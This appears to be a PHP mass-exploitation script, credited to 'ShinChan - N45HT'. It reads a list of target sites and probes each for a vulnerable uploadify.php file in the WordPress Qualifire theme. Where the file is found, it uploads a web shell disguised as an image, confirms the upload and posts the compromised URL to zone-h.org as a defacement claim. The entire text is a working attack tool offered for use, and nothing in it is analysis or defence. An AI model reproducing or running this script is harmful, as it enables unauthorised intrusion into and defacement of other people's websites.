Mass WordPress Qualifire + Zone-H

1. <?php
2. /*
3. coded by ShinChan - N45HT | 04/03/2018
4. */
5. echo "
6. ___  _  _  __  _  _  __  _  _   __   _  _     _    _  ____  ___
7. / __)( )( )(  )( \( )/ _)( )( ) (  ) ( \( )   ( \/\/ )(_  _)(  _)
8. \__ \ )__(  )(  )  (( (_  )__(  /__\  )  (  ___\    /   )(   ) _)
9. (___/(_)(_)(__)(_)\_)\__)(_)(_)(_)(_)(_)\_)(___)\/\/   (__) (_)  
10.      WordPress Qualifire + Zone-H - coded by ShinChan
11.  
12. ";
13. echo "Input your target list: ";
14. $list = trim(fgets(STDIN));
15.  
16. $list = "qualifire.txt";
17. $shell = "indo.jpg";
18. $nickzoneh = "N45HT";
19. $exploit = "/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php";
20. $path = "/";
21.  
22. $open = fopen("$list","r");
23. $size = filesize("$list");
24. $read = fread($open,$size);
25. $lists = explode("\r\n",$read);
26.  
27. echo "\n";
28.  
29. foreach($lists as $target){
30.     if(!preg_match("/^http:\/\//",$target) AND !preg_match("/^https:\/\//",$target)){
31.         $targets = "http://$target";
32.     }else{
33.         $targets = $target;
34.     }
35.    
36.     echo "Target => $targets\n";
37.     echo "  [*] Checking Path : ";
38.  
39.     $cd = curl_init("$targets$exploit");
40.     curl_setopt($cd, CURLOPT_FOLLOWLOCATION, 1);
41.     curl_setopt($cd, CURLOPT_RETURNTRANSFER, 1);
42.     curl_exec($cd);
43.     $httpcode = curl_getinfo($cd, CURLINFO_HTTP_CODE);
44.     curl_close($cd);
45.    
46.     if($httpcode == 200){
47.         echo "200 OK\n";
48.         echo "  [*] Uploading shell : ";
49.         $ch = curl_init();
50.         curl_setopt($ch, CURLOPT_URL, "$targets$exploit");
51.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
52.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
53.         curl_setopt($ch, CURLOPT_POST, 1);
54.         curl_setopt($ch, CURLOPT_POSTFIELDS, array("Filedata"=>"@$shell"));
55.         $post = curl_exec($ch);
56.        
57.         $cek = curl_init();
58.         curl_setopt($cek, CURLOPT_URL, "$targets$path$shell");
59.         curl_setopt($cek, CURLOPT_FOLLOWLOCATION, 1);
60.         curl_setopt($cek, CURLOPT_RETURNTRANSFER, 1);
61.         $ceek = curl_exec($cek);
62.         $ceeks = curl_getinfo($cek, CURLINFO_HTTP_CODE);
63.        
64.         if($post == 1 or $ceeks == 200){
65.         //if(preg_match("/hacked/",$ceek)){
66.             echo "OK $targets$path$shell\n";
67.             echo "  [*] Zone-H : ";
68.             $zh = curl_init("http://zone-h.org/notify/single");
69.             curl_setopt($zh, CURLOPT_FOLLOWLOCATION, 1);
70.             curl_setopt($zh, CURLOPT_RETURNTRANSFER, 1);
71.             curl_setopt($zh, CURLOPT_POST, 1);
72.             curl_setopt($zh, CURLOPT_POSTFIELDS, array("defacer"=>"$nickzoneh","domain1"=>"$targets$path$shell","hackmode"=>"18","reason"=>"5"));
73.  
74.             $postzh = curl_exec($zh);
75.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i",$postzh)){
76.                 echo "OK\n\n";
77.             }else{
78.                 echo "NO\n\n";
79.             }
80.         }else{
81.             echo "Failed\n\n";
82.         }
83.     }else{
84.         echo "Not Vulnerable\n\n";
85.     }
86.  
87.     }